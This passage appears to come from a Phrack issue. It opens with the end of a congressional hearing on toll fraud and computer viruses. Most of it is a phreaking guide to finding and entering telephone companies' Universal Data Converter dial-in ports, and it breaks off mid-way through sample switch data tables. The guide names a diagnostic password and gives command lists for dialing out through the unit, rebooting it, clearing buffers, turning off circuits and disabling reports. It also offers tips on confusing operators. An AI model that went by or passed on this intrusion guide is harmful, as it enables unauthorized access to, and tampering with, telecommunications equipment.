forefront of Federal activity? Mr. GUIDRY. Yes, sir, it is. Mr. FIELDS. Do they have the resources to adequately deal with this problem? Mr. GUIDRY. No, sir. The problem is growing so rapidly that they are undermanned in this area but have asked for additional manpower. Mr. FIELDS. Is this a priority for the Secret Service? Mr. GUIDRY. Yes, sir, it is. Mr. FIELDS. Thank you, Mr Chairman. Mr. MARKEY. The gentleman's time has expired. Again, it is a $4 to $5 billion problem. Mr. HAUGH. That is what our research indicated. Mr. MARKEY. There were 35,000 victims last year alone. Mr. HAUGH. Yes, sir, and this is only users, large users. Now it can be businesses, nonprofits. There is a university on the East Coast that just this last week got hit for $490,000, and the fraud is continuing. Mr. MARKEY. The gentleman from Ohio. Mr. OXLEY. Thank you, Mr. Chairman. Let me ask the witnesses: Other than making the penalties tougher for this type of activity, what other recommendations, if any, would any of you have that we could deal with, that our subcommittee should look at, and the Judiciary Committee, I assume, for what we might want to try to accomplish? Mr. Haugh? Mr. HAUGH. I happen to disagree with a couple of the witnesses who have indicated tougher penalties. I mean it sounds great. You know, that is the common instant reaction to anything, expand the penalties. I happen to think 20 years is plenty enough for criminal penetration of a telecom system, and there are a few housekeeping things that could be done. The problem isn't the adequacy of the law, the laws are pretty adequate, and, as Mr. Delaney indicated, you have a violation someplace, you have got a State law and a Federal law, both, and if you are a smart prosecutor, there are about eight different ways you can go after these criminals. The truth is, we have got inadequate enforcement, inadequate funding, inadequate pressure on the part of the Congress on the FCC to make more proactive efforts and to put more heat on the industry to coordinate. The truth is that the carriers compete with each other fiercely. They, with some limited exceptions, don't share appropriate information with each other. The LEC's and the RBOC's hide behind privacy; they hide behind other excuses not to cooperate with law enforcement and with the rest of the industry as effectively as they should. So I think putting the heat on the industry, putting the heat on the FCC, more adequately funding the FCC, more adequately funding the Secret Service, and having hearings like this that focus on the problem is the answer and not expanding the penalty from 20 years to 25 years. Nobody gets 20 years anyway, so expanding the 20 years is, to me, not the answer. Mr. OXLEY. What is the average sentence for something like that? Mr. HAUGH. I think the average toll fraud criminal who actually goes to jail -- and they are few and far between -- spends 3 to 6 months, and they are out. Now recidivism levels are low, I agree with Mr. Delaney. Once you catch them, they rarely go back to it. So it isn't a question of putting them in jail forever, it is a question of putting them in jail. The certainty of punishment level is very low. We talked to a drug dealer in New York City who left the drug business to go into toll fraud because he told me he can make $900,000 a year -- nontaxable income, he called it -- and never ever worry about going to jail. Mr. DELANEY. In New York City, I have never seen anybody go to jail on a first offense for anything short of armed robbery, let alone telephone fraud. They typically get 200 hours of community service, depending upon the judge. These people that I am speaking about are not the computer hackers that we were speaking about earlier, these are the people that are the finger hackers that break into the PBX's around the country. These are immigrants in the United States, they are adults, they know how to operate a telephone. They sit there generally -- almost every one that we have arrested so far uses a Panasonic memory telephone, and they sit there night and day try ing to hack out the PBX codes. They go through all the default codes of the major manufacturers of PBX's. They know that much. We don't have a single person in New York City, that I know of, that is hacking PBX's with a computer. The long distance carriers can see patterns of hacking into 800 lines, which are typically the PBX's, and they can see that it is being done by telephone, by finger hacking a telephone key pad, as opposed to a computer. The war dialing programs that Mr. Haugh referred to are typically used by the computer hackers to get these codes, but they create only a minuscule amount of the fraud that is ongoing in the country. The great majority is generated by the finger hackers who then disseminate those codes to the telephone booths and the call selling operations that operate out of apartments in New York City. In one apartment with five telephones in it that operates 16 hours a day for 365 days a year selling telephone service at $10 for 20 minutes, you take in $985,000. It is a very profitable business. One of the individuals we arrested that said he did this because it was more profitable and less likely that he be caught than in selling drugs was murdered several months after we arrested him in the Colombian section of Queens because he was operating as an independent. It is a very controlled situation in New York City, and different ethnicities throughout New York City control the call sell operations in their neighborhoods, and everyone in those neighborhoods knows where they can go to make an illicit phone call or to get a phone cloned, whether it is a reprogrammed phone or rechipped. Mr. OXLEY. Mr. Guidry, did you have a comment? Mr. GUIDRY. Well, I think that we really do need to enforce the laws and we need to make some statutory changes in title 18, section 1029 to include cellular and wireless. I have been in courtrooms where really savvy defense attorneys say, "Well, it does not specifically indicate cellular or wireless," and that raises some question in the jury's mind, and I would just as soon that question not be there. Mr. OXLEY. Thank you. Mr. Chairman, I see we have got a vote, and I yield back the balance of my time. Mr. MARKEY. Thank you. We are going to have each one of you make a very brief summary statement to the committee if you could, and then we are going to adjourn the hearing. As you know, the Federal Communications Commission will be testifying before this subcommittee next week. We have a great concern that, although they held an all-day hearing on toll fraud last October, while we thought they were going to move ahead in an expeditious fashion, that, with a lot of good information, it has all sat on the shelf since that time. We expected them to act on that information to establish new rules protecting consumers and pushing carriers to do a lot more than they have done thus far to protect their networks. In light of recent court decisions holding that consumers are always liable I think that action by the FCC is long overdue, and at the FCC authorization hearing next week I expect to explore this issue with the commissioners in depth, so you can be sure of that, Mr. Haugh. Let's give each of you a 1-minute summation. Again, we will go in reverse order and begin with you, Mr. Guidry. Mr. GUIDRY. Thank you, sir. Telecommunications fraud, of course, is going internationally, and as it goes internationally and starts to franchise and get more organized, we are going to have to figure out a better way to combat it. Industry itself right now is putting its best foot forward. However, I would ask this committee to strongly look at changing some of this legislation and to also increase law enforcement's efforts through manpower. Thank you very much, sir. Mr. MARKEY. Thank you. Mr. Haugh. Mr. HAUGH. I agree with Mr. Guidry that there are some housekeeping changes that need to be made, and the particular title and section he referred to should definitely be amended to include more clearly wireless. The overall problem is an immense one; it is a very serious one; it is a complicated one. Everybody is at fault. Finger pointing has been carried to an extreme. Again, I think the long distance carriers, the big three -- AT&T, MCI, and Sprint -- have done a superb job of coming up to speed with monitoring. They are starting to cooperate better. They have really come to the table. The laggards are the LEC's and the RBOC's, the CPE manufacturers, and the FCC. In fairness to the FCC, they are understaffed, undermanned, underfunded. They can't even take care of all their mandated responsibilities right now, let alone take on new chores. All that said, there is a great deal the FCC can do -- jawboning, regulations, pushing the LEC's and the RBOC's, in particular, to get real, get serious -- and I would urge this committee -- applaud your efforts and urge you to continue that. Mr. MARKEY. Thank you. Dr. Tippett. Mr. TIPPETT. Thank you. The computer virus issue is a little bit different than the toll fraud issue. In fact, there are no significant laws that deal with viruses, and, in fact, the fact that there are no laws gives the people who write viruses license to write them. The typical statement you read is, "It's not illegal, and I don't do anything that is illegal." So in the computer virus arena we do need laws. They don't need to be fancy; they don't need to be extensive. There are some suggestions of approaches to virus legislation in my written testimony. We also need education, and I would encourage Congress to underwrite some education efforts that the private sector could perform in various ways, perhaps through tax incentives or tax credits. The problem is growing and large. It exceeds $1 billion already in the United States, and it is going to be a $2 billion problem in 1994. As bad as toll fraud seems, this virus issue is, oddly, more pervasive and less interesting to a whole lot of people, and I think it needs some higher attention. Mr. MARKEY. Thank you. Mr. Goldstein. Mr. GOLDSTEIN. Thank you. I would like to close by cautioning the subcommittee and all of us not to mix up these two very distinct worlds we are talking about, the world of the criminal and the world of the experimenter, the person that is seeking to learn. To do so will be to create a society where people are afraid to experiment and try variations on a theme because they might be committing some kind of a crime, and at the same time further legislation could have the effect of not really doing much for drug dealers and gangsters, who are doing far more serious crimes than making free phone calls, and it is not likely to intimidate them very much. I think the answer is for all of us to understand specifically what the weaknesses in the technology are and to figure out ways to keep it as strong and fortress-like as possible. I do think it is possible with as much research as we can put into it. Thank you. Mr. MARKEY. Thank you, Mr. Goldstein. Mr. Delaney. Mr. DELANEY. Last year, the Secret Service and the FBI arrested people in New York City for conducting illegal wiretaps. The ability to still do that by a hacker exists in the United States. Concerned with privacy, I am very happy to see that something like the Clipper chip is going to become available to protect society. I do hope, though, that we will always have for the necessary law enforcement investigation the ability to conduct those wiretaps. Without it, I see chaos. But with respect to the cellular losses, the industry is coming along a very rapid rate with technology to save them money in the future, because with encryption nobody will be able to steal their signals either. Mr. MARKEY. Thank you, Mr. Delaney. I apologize. There is a roll call on the Floor, and I only have 3 minutes to get over there to make it. You have all been very helpful to us here today. It is a very tough balancing act, but we are going to be moving aggressively in this area. And we are going to need all of you to stay close to us so that we pass legislation that makes sense. This hearing is adjourned. Thank you. [Whereupon, at 12:16 p.m., the subcommittee was adjourned.] ==Phrack Magazine== Volume Five, Issue Forty-Five, File 21 of 28 **************************************************************************** The Universal Data Converter ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Written by: Maldoror ~~~ChUrcH oF ThE nOnConFOrMisT~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -=[ DELAMO LABS INC ]=- """"""""""""""""""""""""""""" What IS a UDC?! """"""""""""""" The Universal Data converter (UDC), by Applied Computing Devices, was put into widespread use in 1979. A UDC is used primarily in connection with a variety of switches, to log everything the switch does, and report it to the Central Office in a standard format, allowing the monitoring and reporting of a variety of different switches by one processor without the need of understanding each individual switch. This lets the Telco-Trouble shooters monitor exactly how much traffic is passing thru a given switch. Exact number of calls, busys & fraud attempts, are some examples. A UDC will give detailed reports of such activity, as well as hold it in a buffer file which you can view for your own excitement. The real purpose of this piece of hardware is to buffer data, convert it to a standard format, and send it on it's merry way to the Central Processor. Information may be buffered for up to an hour, before being able to be received by the Central Processor. Which Switches use a UDC? """"""""""""""""""""""""" Well, apparently, nearly all switches owned by a tel-co use a UDC for their daily reports. Here is a list of the switches of which I know may be connected to a converter: At&t Autoplex 100 ITT/North 1210 ITT/North NX-1E ITT/North "1200" Series (DSS-1) GTE GTD-1 (Automatic Electric no. 1 EAX) GTE GTD-2 (Automatic Electric no. 2 EAX) GTE GTD-3 (Automatic Electric no. 3 EAX) GTE GTD-5 Motorola EMX-250 NEC NEAX-61 NEC ND-20S Northern Telecom DMS-10 Northern Telecom DMS-100 Northern Telecom DMS-200 Northern Telecom DMS-250 Northern Telecom DMS-300 Northern Telecom SL-1 (Seen these around locally) Northern Telecom SP-1 PABX Stromberg Carlson DCO TRW Vidar ITS-4 TRW Vidar ITS-4/5 TRW Vidar ITS-5 Western Electric 5 ESS GTE PBX's (GTD-1000, GTD-4600) General Configurations: """"""""""""""""""""""" A UDC may be configured in several ways. A UDC consists of up to 6 ports. Port 0 is usually a dialin line, in which it is connected to a 300/1200 baud modem, so that GTE employees may call to check their switch information in the field. Port 0 may also be a dedicated line, which is linked to a computer somewhere important, but if this is the case, you can't have found it anyways, so don't worry about it. (Unless of course you another indial port possibly 1) Port 2 is usually the line which is hardwired to the data output of the switch. This port receives the messages of a switch, analyses the data, buffers it, and waits until it is told to send the data to the CP, which may be every time the buffer flips, which of course is configured by hardware. It is not required that port 2 be the hardwire, although it is just the most common configuration. Port 1 & 3-7 are also multi-use ports , which may be configured either for a dedicated line, or a standard phone line, just like port 1. The difference between this port and port 0 however, is that this port may also be used to test lines other than the hardware set report line #. (More later.) NOTE: ANY of these ports can be completely different depending on the setup of the UDC's cards, and which slot they are in... The UDC can be configured (though I have never seen it this way) so that any of the six ports can preform the functions instead of the first three. If you find a UDC, be sure to check all the ports, and not just three. The general idea of this box of tin is that it will monitor any switch, collect data into a buffer, and store it until it need be converted and polled by the SAC. When the data is sent out, it is sent in standard UDC format, regardless of the type of switch, therefore any switch may be monitored by the SAC without having to be converted on the spot. Yeah Great what the ?#!$ do I do? """"""""""""""""""""""""""""""""' Scan your local area for all numbers ending in 99xx or 00xx, often (with GTE anyways) the prefix may be something like 446-9988, or something outright obvious. Once you find one, you will know, because you will get one of two things. Depending on the configuration of the UDC, you will either begin getting a dump of data, which will go into detail about the switch information, or you will get a prompt: *B*> When you receive this prompt, you can make your life easy by typing HELP in all caps, for a menu of commands, which will seem important at first (don't fool yourself). Each letter between *'s represents a separate processor (yes even this tin box has more than one! These letters will be in the menu when you type HELP. To change processors, you will need to hold control while pressing the letter of the processor you wish to change to. Here is a list of commands for each processor: The Basic processor ~~~~~~~~~~~~~~~~~~~ *B*> DATE Display the system Date *B*> DATE mm/dd/yy Set the date to mm/dd/yy *B*> DIAGNOSTIC This puts you in debug mode for the UDC's program When typing this command the UDC will respond with "PASSWORD" and will not echo letters. If the password given is correct, you will get a prompt like this: *B*> DIAG PASSWORD 305 > I enter the good password< DEBUG 1,3 > 1,3 are the ports in use < ? At this point you can reboot the UDC by typing: ? G (ADDR)=1000 > I tell it to jmp to 1000 < Then all hell will break loose...trust me! O.k. well it will look like it anyway... *B*> HELP Duh um, a Menu *B*> RAMPAGE Test traffic data storage area *B*> SYSTEM Display system checksums *B*> TIME Display system time *B*> TIME hh:mm:ss Set system time (confuse them, set it back then forwd) The Patch Processor ~~~~~~~~~~~~~~~~~~~ *P*> ANSWER n Take channel 'n' off hook (neato) *P*> BAUD c,bbbb,nnn Set Channel 'c' Baud rate to 'bbbb', and number of nulls to 'nnn' *P*> HANGUP n Put channel 'n' on hook (log out too) *P*> HELP Help Menus *P*> PATCH n Patch calling port to port 'n' (Dial out!) It IS possible to patch to modem ports, but I don't recommend it...all GTE numbers have their own COS. (Easy to find you) The Plant Queue Processor ~~~~~~~~~~~~~~~~~~~~~~~~~ *Q*> ALARM Display the alarm (error message) string *Q*> ALARM xx..xxx Set Alarm String (change it back if u want) *Q*> CLEAR Clear buffer without printing contents (not preferred) *Q*> DUMP Print and clear contents (destructive, not preferred) *Q*> HELP Help Menu *Q*> LIMITS Display buffer alarm threshold *Q*> LIMITS nnnnn Set buffer alarm threshold to 'nnnn' *Q*> LIST Display buffer contents (Better than dump)(ok!) *Q*> LIST nnnn Display buffer contents from 'nnnn' to end The Report Processor ~~~~~~~~~~~~~~~~~~~~ *R*> BACKUP Transfer a copy of the ROM based table to the editor workspace *R*> DEFAULT Make the ROM based table effective (can crash) *R*> EDIT Engage in edit mode APPEND Add line to RMT (Hi there Gen-Tel!) DELETE Delete line from RMT END End edit session HELP List Editor Commands LIST List RMT MODIFY Modify a line in RMT *R*> DOWNLOAD Download RMT to PROM programmer (ha!) *R*> HELP More menus *R*> LIST List effective RMT *R*> LIST N List RMT without Heading *R*> LIST nnnn List line 'nnnn' of effective RMT *R*> LIST nnnnN List line 'nnnn' of effective RMT without heading *R*> LIST nnnn,mmmm List lines 'nnnn' to 'mmmm' of RMT *R*> LIST nnnn,mmmmN List lines 'nnnn' to 'mmmm' of RMT without heaading *R*> NEW Clear the editor workspace *R*> USER Make RAM based RMT active The Scanner Processor ~~~~~~~~~~~~~~~~~~~~~ *S*> CIRCUIT Display Status Report *S*> CIRCUIT nnn OFF Turn off circuit 'nnn' and print Status report *S*> CIRCUIT nnn OFF N Turn off circuit 'nnn' without report *S*> CIRCUIT nnn,mmm OFF Turn off circuts 'nnn' to 'mmm' *S*> CIRCUIT nnn,mmm OFF N Turn off 'nnn' to 'mmm' without report *S*> CIRCUIT nnn ON Turn 'nnn' ON and print report *S*> CIRCUIT nnn ON N Turn 'nnn' ON without report *S*> CIRCUIT nnn,mmm ON Turn circuts 'nnn' to 'mmm' on and print status report *S*> CIRCUIT nnn,mmm,ON N Turn on 'nnn' to 'mmm' but do not print report *S*> REPORT Display names of disable reports *S*> REPORT report.type OFF Disable 'report.type' for printing *S*> REPORT report.type ON Enable 'report.type' for printing *S*> RESTART Restart scanner interrogation *S*> ROUTE n Display all future alarm reports on channel 'n' *S*> STOP Stop scanner interrogation *S*> TEST Dial the alarm number set on the system optioning board (dip switches on the config board) for communication line testing. *S*> TEST 3,1 nnn nnn nnnn Dial the indicated number (on port 3) and test the communication lines. If you test with the port you called in on, you will have to hangup and call back for the results. (Port 0) The Traffic Processor ~~~~~~~~~~~~~~~~~~~~~ *T*> ACTIVE Display the contents of the active buffer *T*> BANK Display bank to be polled *T*> BANK n Set Bank to be polled (bank 'n') *T*> FLIP Flip the buffers (this MAY cause polling, depending on the hardware (switch) & port configuration) *T*> HELP Processor Menus *T*> METERS Display current meter limits *T*> METERS nnnn Set upper meter limits *T*> METERS mmmm,nnnn Set lower and upper meter limits *T*> METERS mmmm,nnnn V Set variable meter limits *T*> METERS mmmm,nnnn F Set fixed meter limits *T*> PASSIVE Display the contents of a Passive buffer *T*> TRAFFIC Interrupt or resume traffic after user interaction with channel 1 Standard Control Codes ~~~~~~~~~~~~~~~~~~~~~ ^A Start of Heading ^B Start of Text ^C End of Text ^D End of transmission ^E Enquiry (no not like CBI) ^F Acknowledgment ^G Bell :) ^H Backspace ^I Horizontal Tab ^J Line feed ^K Vertical Tab ^L Form Feed ^M Carriage return ^N Shift out ^O Shift in ^P Data line escape ^Q Device Control 1 ^R Device Control 2 ^S Device Control 3 ^T Device Control 4 ^U Negative Acknowledgment ^V Synchronous Idle ^W End of Transmission Block ^X Cancel ^Y End of Medium ^Z Substitute What is all this? ~~~~~~~~~~~~~~~~ The RMT data is the data transmitted to the UDC by the switch. This data is formatted in such a way that it tells the UDC what is happening and what has already happened since the last buffer flip. This data is then converted to a standard format to be transferred to the Central Processor. For examples of switch output, refer to the switch example list further in this article. Here is an example of the System Output data, after being translated into standard format by the UDC: The first two lines of the System Output data will contain the values of the 19 status registers as follows: 0 1 2 3 4 5 6 7 8 9 000 00345 00003 00013 00000 00005 00000 00005 01903 00012 00000 001 06800 01021 01101 01065 00000 00003 00007 02435 00000 00000 10 11 12 13 14 15 16 17 18 19 The registers are as follows: 0 UDC control program number (usually 345, newer versions may be diff.) 1 UDC control program version (1,3,5,etc.) 2 Hour at buffer flip (active to passive) 3 Minute at buffer flip (active to passive) 4 Number of buffer flips since power on (65535 maximum) 5 Power interrupt flag (99 if fewer than two intervals have occurred since the power interrupt or hard restart; 0 otherwise) 6 Number of reports in the buffer 7 Total number of meters in this buffer (including headers) 8 Hour at buffer flip (passive to active) 9 Minute at buffer flip (passive to active) 10-13 Strapping Card signature 14 Total number of errors since last had reset or power up 15 Number of soft restarts since last power-up or hard restart 16 Number of buffer flips since last soft restart 17 Address of last error which caused a soft restart 18-19 unused When a traffic report is to be sent, the following header will be sent (in the System Output) to the UDC processor(s) to tell the traffic processor to begin buffering the report: 0 1 2 3 4 5 6 7 8 9 190 65535 00008 00022 00000 00000 00000 00000 00000 00000 00000 191 00004 00027 00078 00700 00800 31227 00074 00000 00002 00018 192 00078 00000 00000 00000 00000 00000 00000 00000 00000 00000 10 11 12 13 14 15 16 17 18 19 The registers for the header are as follows: 0 65535 (This signals the beginning of the switch report) 1 Message type obtained from the 'type' field of the RMT 2 The number of registers used by the message, including the 10 registers of this header. 3-9 unused (00000) Ok ?! Now what?! ~~~~~~~~~~~~~~~~~ Well now that I have explained all the commands, the data formats, etc, of the UDC, you can now check the RMT or TRAFFIC buffers to see exactly what type of switch you are monitoring. Here are some examples of the Data format for the following switches: ************************************************************************ ------------------- AT&T AUTOPLEX 100 SWITCH ------------------------- ************************************************************************ Example of RMT data: ~~~~~~~~~~~~~~~~~~~ ENTRY REQUIRED STRING NEW ACTION TYPE STARTING ENDING PHASE PHASE REGISTER REGISTER ------------------------------------------------------------------------------ 001 000 /M 00/ 001 075 255 65535 65535 002 001 /BLOCK C/ 002 077 001 00020 00169 003 002 /FINISH/ 001 073 255 65535 65535 004 001 /CELL 001/ 001 077 002 00170 00229 005 001 /CELL 002/ 001 077 003 00230 00289 006 001 /CELL 003/ 001 077 004 00290 00349 007 001 /CELL 005/ 001 077 005 00350 00409 008 001 /CELL 006/ 001 077 006 00410 00469 009 001 /CELL 007/ 001 077 007 00470 00529 010 001 /CELL 008/ 001 077 008 00530 00589 011 001 /CELL 009/ 001 077 009 00590 00649 012 001 /CELL 010/ 001 077 010 00650 00709 013 001 /CELL 011/ 001 077 011 00710 00769 014 001 /CELL 012/ 001 077 012 00770 00829 015 001 /CELL 013/ 001 077 013 00830 00889 016 001 /BLOCK H/ 001 077 014 00890 00949 017 001 /FINISH/ 001 073 255 65535 65535 Example of TRAFFIC report: ~~~~~~~~~~~~~~~~~~~~~~~~~ M 00 3/7/1993 THU 13:00:00 #068 A 30 BLOCK C 000034 13:00 3/7/1993 12:00 3/7/1993 (0) 000100 000313 000197 000049 000029 000103 000226 000125 000220 000066 (1) 000180 000291 000238 000123 000050 000154 000326 000146 000074 000089 (2) 000000 000007 000000 000000 000000 000000 000000 000000 000000 000000 (3) 000000 000000 000000 000000 000000 000000 000000 000036 000180 000000 (4) 000023 000023 000366 000000 000000 000000 000000 000000 000000 000000 (5) . . . (more data) . . (13) 000000 000000 000000 000000 000000 000000 000000 000000 000000 000000 FINISH 03/07/93 13:30:38 #371 . . . M 00 3/7/1993 THU 13:00:00 #068 00 REPT:AMPSTRSF CELL 001 START 120 STOP 130 03/07 COMPLETE 000089 000014 000000 000000 000000 000000 000084 000014 000201 000001 000052 000050 000048 000036 000002 000008 000003 000199 000000 002654 000000 000031 000000 000360 000000 000000 000000 000036 003728 005170 000000 004065 003170 000000 003992 000071 000000 000067 000146 000000 000241 000000 000000 000000 000000 000000 000000 000000 000000 000000 #077 M 00 REPT:RC CENSUS OFFICE RC CHANNEL = REM TRCA OVER 0% FULL RBA OVER 5% FULL RCMDS MODE = 0 #082 M 00 REPT:RC SOURCE SCV=0 CFV=0 RCS=0 DLY=0 VSS=0 ACS=0 CSR=0 BIS=0 TRB=0 FBP=0 LOG=0 CR6=0 #083 . . . (more) . . ************************************************************************* --------------------- ITT/North 1210 Switch -------------------------- ************************************************************************* Example of RMT data: ~~~~~~~~~~~~~~~~~~~ ACTION IN LINE 003 FIXED LOWER: 00000 UPPER: 02039 ENTRY REQUIRED STRING NEW ACTION TYPE STARTING ENDING PHASE PHASE REGISTER REGISTER ------------------------------------------------------------------------------- 001 000 /:/ 001 076 255 65535 65535 002 001 /TYPE/ 002 073 255 65535 65535 003 002 /2 / 003 077 002 00020 00098 004 002 /4 / 003 077 004 00100 00319 005 002 /5 / 003 077 005 00320 00469 006 002 /16 / 003 077 016 00670 01769 007 002 /18 / 003 077 018 01770 02040 008 002 /20 / 003 077 020 00470 00669 009 003 /END/ 000 073 255 65535 65535 Example of a TRAFFIC report: ~~~~~~~~~~~~~~~~~~~~~~~~~~ DSS-1 VAR-00 VER-00 PAT=43 ACD 938 R TRAFF 4703 12/06/93 09:00:00 SBG-B DATA FROM 1210 SWITCH TO UDC DIAL TONE DELAY TYPE CODE SCAN(SEC) BRP START/TIME LENGTH(MIN) ORDER/DATE 2 R 10 21(45) 08:00 60 12/16/93 THRESHOLD TIME 2.0 LSID DTD TIME(SEC) CALLS DELAY CALLS 1 .34 60 1 2 .47 34 0 SYS TOTAL .43 94 1 END 936 TRAFF 4703 12/06/93 09:45:55 SBG-B SEPERATIONS TYPE CODE SCAN(SEC) BRP START/TIME LENGTH(MIN) ORDER/DATE 4 R NONE 10(43Z 12:00 60 12/06/79 CNTR* VALUE CNTR* VALUE CNTR* VALUE CNTR* VALUE CNTR* VALUE 1 32 2 65 3 73 4 84 5 64 6 42 7 84 8 51 9 63 10 69 END 9344 TRAFF 4703 12/06/93 09:46:00 CALL COUNT . . (more) . . note: This thing is a beast! If you find one of these call a museum quick!!! ************************************************************************* --------------- ITT/North NX-1E Switch ----------------------- ************************************************************************* RMT data example: """""""""""""""""" ACTION IN LINE 000 VARIABLE LOWER: 00000 UPPER: 00019 ENTRY REQUIRED STRING NEW ACTION TYPE STARTING ENDING PHASE PHASE REGISTER REGISTER --------------------------------------------------------------------------- 001 000 /:/ 001 076 255 65535 65535 002 001 /DATA TYPE/ 001 078 001 65535 65535 003 001 /END OF/ 000 073 255 65535 65535 Example of a TRAFFIC report: """""""""""""""""""""""""""" 26 JUNE 86 10:00:00 THT 735 TM GROUPED DATA DUMP REPORT TIME OF LAST REPORT: 26 JUNE 78 09:00:00 DATA TYPE GROUPED DATA SOTU 572 681 SOTP 434 863 RSOU 894 RSOP 978 GTCA 1 1 2 3 4 5 6 SLA 0 0 0 0 1 1 1 TKTU 631 408 17 358 951 426 324 436 384 277 462 46 853 956 TKTP 543 753 783 34 572 294 815 426 85 357 392 739 212 142 TK2U 584 282 53 19 BSWU 27 7 QTCU 18 END OF GROUPED DATA DUMP *************************************************************************** ----------- THE GTE GTD-1 (Automatic Electric No.1 EAX) Switch------------- *************************************************************************** Example of RMT data: ~~~~~~~~~~~~~~~~~~~ ACTION IN LINE 007 VARIABLE LOWER: 00000 UPPER: 00079 ENTRY REQUIRED STRING NEW ACTION TYPE STARTING ENDING PHASE PHASE REGISTER REGISTER --------------------------------------------------------------------------- 001 000 /HO UR/ 000 075 255 65535 65535 002 000 /MS 19/ 001 077 001 00020 00039 003 001 /MS 19/ 001 081 001 00101 65535 004 001 /COUNTS/ 001 073 255 65535 65535 005 001 /MS 21/ 002 077 002 00040 00079 006 002 /MS 21/ 002 081 001 00101 65535 007 002 /COUNTS/ 003 073 255 65535 65535 Example of TRAFFIC report: ~~~~~~~~~~~~~~~~~~~~~~~~~ I 00 HO UR 1:00:00 R 00 ME RR 9 R 00 MS 19 7 COUNTS GREATER THAN 0 R 00 MS 19 1,01 1152 1,02 1350 1,03 1194 R 00 MS 19 1,04 1378 1,05 1212 1,06 1231 R 00 MS 19 1,07 1099 R 00 MS 21 7 COUNTS GREATER THAN 0 R 00 MS 21 1,01 397 1,02 570 1,03 574 R 00 MS 21 1,04 542 1,05 682 1,06 668 R 00 MS 21 1,07 542 R 00 MS 22 7 COUNTS GREATER THAN 0 ************************************************************************** --------- THE GTE GTD-2 (Automatic Electric No.2 EAX) Switch ------------- ************************************************************************** Example of RMT data: ~~~~~~~~~~~~~~~~~~~ ACTION IN LINE 007 VARIABLE LOWER: 00000 UPPER: 00079 ENTRY REQUIRED STRING NEW ACTION TYPE STARTING ENDING PHASE PHASE REGISTER REGISTER --------------------------------------------------------------------------- 001 000 /S@/ 001 084 255 65535 65535 002 001 /MPTK/ 001 078 001 65535 65535 003 001 /MPSW/ 001 078 002 65535 65535 004 001 /MPLB/ 001 078 003 65535 65535 005 001 /MPMA/ 001 078 004 65535 65535 006 001 /MPLS/ 001 078 005 65535 65535 007 001 /MPSP/ 001 078 006 65535 65535 Example of TRAFFIC report: ~~~~~~~~~~~~~~~~~~~~~~~~~ S@1900 TDA MPTK 08-14-86 1900 2000 TRK ICT ICT ICT OGT OGT OGT PRE GRP USAGE ATT HITS USAGE ATT OFL DIAL 128 0 0 0 31 18 0 0 129 0 0 0 32 12 0 0 130 0 0 0 0 0 0 0 131 0 0 0 486 269 0 0 132 0 0 0 55 13 0 0 133 317 143 0 264 108 0 0 134 0 0 0 1 2 0 0 S@1901 TDA PMSW 08-14-86 1900 2000 SVC USAGE ATT OFL 10 3 10 3 164 0 11 17 163 0 14 302 2523 0 15 200 2391 0 16 377 2187 0 18 84 1171 0 19 113 1477 0 ************************************************************************** ------------------- The Motorola EMX-250 Switch -------------------------- ************************************************************************** Example of RMT data: ~~~~~~~~~~~~~~~~~~~ ACTION IN LINE 003 VARIABLE LOWER: 00000 UPPER: 00389 ENTRY REQUIRED STRING NEW ACTION TYPE STARTING ENDING PHASE PHASE REGISTER REGISTER ---------------------------------------------------------------------------- 001 000 /TRA21/ 001 078 001 65535 65535 002 001 / / 002 073 255 65535 65535 003 002 /^M/ 000 078 002 65535 65535 Example of TRAFFIC report: ~~~~~~~~~~~~~~~~~~~~~~~~ TRA21 0307 1400 1500 0369 0000 00 00129 00045 00178 00127 00000 00000 00000 00000 00000 00000 00000 00001 00000 00000 00000 00000 101 000 BBBBBBBBBBBBBBBBBBBBBBBBBB 262 1234 1 TRA30 0307 1400 1500 0000 0000 00 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 247 000 BBBBBBBBBBBBBBBBBBBBBBBBBB 262 2134 1 TRA31 0307 1400 1500 0000 0000 00 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 253 000 BBBBBBBBBBBBBBBBBBBBBBBBBB 262 1234 1 TRA32 0307 1400 1500 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 254 000 BBBBBBBBBBBBBBBBBBBBBBBBBB 262 1234 1 ************************************************************************ ----------------- NEC ND-20S SWITCH ----------------------- ************************************************************************ Example of RMT data """"""""""""""""""" ENTRY REQUIRED STRING NEW ACTION TYPE STARTING ENDING PHASE PHASE REGISTER REGISTER -------------------------------------------------------------------------- 001 000 /// 000 075 255 65535 65535 002 000 /ORG. CALL/ 001 078 001 65535 65535 003 001 /DUMP END/ 000 073 255 65535 65535 004 000 /SPECIAL DU/ 001 078 002 65536 65535 Example of TRAFFIC report ~~~~~~~~~~~~~~~~~~~~~~~~ 06/21 20:01 CON-TEST NG PL:1 0 5 4 5 4 6 PT:1 0 3 1 6 4 2 06/21 20:02 * TRAFFIC NORMAL DUMP * COM ORG. CALL ATTEMPTS (PEG COUNT) 026613 000079 000233 00000 00000 00000 00038 000000 000114 COM ORG. CALL COMPLETED (PEG COUNT) 012172 000049 000113 000047 OOH TER. CALL COMPLETED (PEG COUNT) 034146 000142 000000 OOH CALLED PARTY BUSY ENCOUNTERED (PEG COUNT) 003356 06/21 20:04 *NORMAL DUMP END* 000000 000000 00H CALLED OFFICE (PEG COUNT) 000000 000000 000000 000000 000000 000000 000000 000000 OOH A-LINK USAGE PER NW BASIS (CCS) 0733.80 0594.40 0000.00 0000.00 OOH TRUNK USAGE (CCS) OGY 0002.40 0004.20 0009.00 0001.60 0009.60 0002.20 0016.00 0000.00 0003.00 0000.00 0000.00 0046.80 0000.00 0003.00 06/21 20:22 *SPECIAL DUMP END* 06/21 20:22 *************************************************************************** ------------------ Northern Telecom DMS-10 Switch ------------------------- *************************************************************************** Example of RMT data: ~~~~~~~~~~~~~~~~~~~ ACTION IN LINE 011 VARIABLE LOWER: 00000 UPPER: 00560 ENTRY REQUIRED STRING NEW ACTION TYPE STARTING ENDING PHASE PHASE REGISTER REGISTER -------------------------------------------------------------------------- 001 000 /OPM001/ 000 072 001 65535 65535 002 000 /OPM002/ 000 078 002 65535 65535 003 000 /OPM003/ 000 078 003 65535 65535 004 000 /OPM004/ 000 078 004 65535 65535 005 000 /OPM005/ 000 078 005 65535 65535 006 000 /OPM006/ 000 078 006 65535 65535 007 000 